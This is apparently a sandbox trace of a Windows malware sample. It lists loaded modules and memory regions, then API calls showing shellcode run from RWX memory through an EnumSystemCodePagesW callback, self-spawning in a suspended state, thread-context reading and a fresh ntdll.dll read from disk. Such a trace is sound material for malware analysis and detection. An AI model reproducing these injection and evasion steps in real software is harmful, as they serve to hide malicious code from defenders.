entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 400 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 401 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 402 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 403 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 404 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 405 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 406 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 407 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 408 start_va = 0x75d90000 end_va = 0x75f07fff monitored = 0 entry_point = 0x75de8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 409 start_va = 0x6b930000 end_va = 0x6b940fff monitored = 0 entry_point = 0x6b931bd0 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\SysWOW64\\wsnmp32.dll" (normalized: "c:\\windows\\syswow64\\wsnmp32.dll") Region: id = 410 start_va = 0x755c0000 end_va = 0x755cdfff monitored = 0 entry_point = 0x755c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 411 start_va = 0x76c90000 end_va = 0x76ceefff monitored = 0 entry_point = 0x76c94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 412 start_va = 0x450000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 413 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 414 start_va = 0x6b8e0000 end_va = 0x6b920fff monitored = 0 entry_point = 0x6b8ee050 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 415 start_va = 0x6b8b0000 end_va = 0x6b8d3fff monitored = 0 entry_point = 0x6b8b4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 416 start_va = 0x6b520000 end_va = 0x6b8a8fff monitored = 0 entry_point = 0x6b5bcc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 417 start_va = 0x71b70000 end_va = 0x71b9efff monitored = 0 entry_point = 0x71b7bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 418 start_va = 0x6b4a0000 end_va = 0x6b51bfff monitored = 0 entry_point = 0x6b4c28b0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 419 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 420 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 421 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 422 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 423 start_va = 0x73e30000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73e39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 424 start_va = 0x8a0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 425 start_va = 0x8e0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 426 start_va = 0x6b470000 end_va = 0x6b492fff monitored = 0 entry_point = 0x6b478940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 427 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 428 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 429 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 430 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 431 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 432 start_va = 0x700c0000 end_va = 0x700dffff monitored = 0 entry_point = 0x700cd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 433 start_va = 0x70090000 end_va = 0x700bbfff monitored = 0 entry_point = 0x700abb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 434 start_va = 0x9e0000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 435 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 436 start_va = 0xa40000 end_va = 0xbc7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 437 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 438 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 439 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 440 start_va = 0xbd0000 end_va = 0xd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 441 start_va = 0xd60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 442 start_va = 0x2160000 end_va = 0x21f0fff monitored = 0 entry_point = 0x2198cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 443 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 444 start_va = 0x490000 end_va = 0x4befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 461 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 462 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 464 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 465 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 466 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 467 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 468 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 469 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 470 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 471 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Thread: id = 5 os_tid = 0x368 [0098.857] __set_app_type (_Type=0x2) [0098.857] __p__fmode () returned 0x76624d6c [0098.857] __p__commode () returned 0x76625b1c [0098.857] __wgetmainargs (in: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c, _DoWildCard=0, _StartInfo=0x19ff14 | out: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c) returned 0 [0098.861] GetStartupInfoW (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0098.861] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0098.861] _wfopen (_FileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wduqqtzg"), _Mode="rb") returned 0x76621268 [0098.861] VirtualAlloc (lpAddress=0x0, dwSize=0x1505, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0098.862] fread (in: _DstBuf=0x1f0000, _ElementSize=0x1505, _Count=0x1, _File=0x76621268 | out: _DstBuf=0x1f0000*, _File=0x76621268) returned 0x1 [0098.862] EnumSystemCodePagesW (lpCodePageEnumProc=0x1f0000, dwFlags=0x0) [0098.865] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x76ed0000 [0098.866] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f7ac | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0098.866] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="ptcgl43g463vgbr58" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58") returned 1 [0098.866] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptcgl43g463vgbr58"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0098.866] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e3ff [0098.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2e3ff, flAllocationType=0x3000, flProtect=0x4) returned 0x490000 [0098.867] ReadFile (in: hFile=0x1e0, lpBuffer=0x490000, nNumberOfBytesToRead=0x2e3ff, lpNumberOfBytesRead=0x19fbbc, lpOverlapped=0x0 | out: lpBuffer=0x490000*, lpNumberOfBytesRead=0x19fbbc*=0x2e3ff, lpOverlapped=0x0) returned 1 [0098.870] CloseHandle (hObject=0x1e0) returned 1 [0098.906] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77460000 [0098.906] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f2b0, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0x32 [0098.906] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eb2c, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0x32 [0098.906] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" [0098.906] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f208*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f26c | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg", lpProcessInformation=0x19f26c*(hProcess=0x1e4, hThread=0x1e0, dwProcessId=0x874, dwThreadId=0xc88)) returned 1 [0098.951] GetThreadContext (in: hThread=0x1e0, lpContext=0x19ef3c | out: lpContext=0x19ef3c*(ContextFlags=0x10007, Dr0=0x7749a1fe, Dr1=0x19ef9c, Dr2=0x19f038, Dr3=0x7a0, Dr6=0x1a1e64, Dr7=0x536cd652, FloatSave.ControlWord=0x10, FloatSave.StatusWord=0x774ba260, FloatSave.TagWord=0x19f001, FloatSave.ErrorOffset=0x19f080, FloatSave.ErrorSelector=0x1a1714, FloatSave.DataOffset=0xa, FloatSave.DataSelector=0x101efd4, FloatSave.RegisterArea=([0]=0x52, [1]=0xd6, [2]=0x6c, [3]=0x53, [4]=0x7c, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xec, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x55, [25]=0x28, [26]=0xb6, [27]=0x9a, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x80, [37]=0xf0, [38]=0x19, [39]=0x0, [40]=0x38, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0xf4, [45]=0xef, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0xf0, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xf4, [65]=0xf0, [66]=0x19, [67]=0x0, [68]=0xa4, [69]=0x9c, [70]=0x49, [71]=0x77, [72]=0x5, [73]=0x28, [74]=0xb6, [75]=0x9a, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x6a2160, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3b5000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x774d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf0, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x30, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x49, [23]=0x77, [24]=0xb8, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x80, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x49, [55]=0x77, [56]=0x45, [57]=0x37, [58]=0xb6, [59]=0x9a, [60]=0xf8, [61]=0xf1, [62]=0x19, [63]=0x0, [64]=0x88, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x94, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xb8, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0xf8, [85]=0xf1, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x40, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x4d, [111]=0x77, [112]=0xed, [113]=0xe6, [114]=0xfa, [115]=0xed, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x49, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x4a, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf0, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xb4, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x88, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x4a, [163]=0x77, [164]=0x6c, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc0, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x6c, [205]=0xf1, [206]=0x19, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xc4, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x80, [291]=0x0, [292]=0xc0, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x90, [306]=0x2f, [307]=0x0, [308]=0x0, [309]=0xc0, [310]=0x2f, [311]=0x0, [312]=0xd4, [313]=0x57, [314]=0x68, [315]=0xf4, [316]=0x39, [317]=0x37, [318]=0xb6, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x60, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x60, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x60, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0xa9, [349]=0x36, [350]=0xb6, [351]=0x9a, [352]=0xe4, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x49, [363]=0x77, [364]=0xc, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x80, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x49, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x48, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x49, [435]=0x77, [436]=0xf8, [437]=0xf1, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x69, [445]=0x37, [446]=0xb6, [447]=0x9a, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x50, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x4a, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x4a, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x60, [489]=0x21, [490]=0x6a, [491]=0x0, [492]=0x7c, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x48, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0098.956] ReadProcessMemory (in: hProcess=0x1e4, lpBaseAddress=0x3b5008, lpBuffer=0x19f280, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f280*, lpNumberOfBytesRead=0x0) returned 1 [0098.956] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eaf4 | out: Wow64Process=0x19eaf4*=1) returned 1 [0098.957] lstrlenW (lpString="rysgtozci.exe") returned 13 [0098.957] lstrlenW (lpString="ntdll.dll") returned 9 [0098.957] lstrlenW (lpString="ntdll.dll") returned 9 [0098.957] lstrlenW (lpString="ntdll.dll") returned 9 [0098.957] lstrlenW (lpString="ntdll.dll") returned 9 [0098.957] lstrlenW (lpString="tdll.dll") returned 8 [0098.957] lstrlenW (lpString="dll.dll") returned 7 [0098.957] lstrlenW (lpString="ll.dll") returned 6 [0098.957] lstrlenW (lpString="l.dll") returned 5 [0098.957] lstrlenW (lpString=".dll") returned 4 [0098.957] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0098.958] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0098.958] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0098.958] ReadFile (in: hFile=0x1ec, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eac4, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19eac4*=0x1784a0, lpOverlapped=0x0) returned 1 [0099.076] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0099.116] CloseHandle (hObject=0x1ec) returned 1 [0099.116] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) 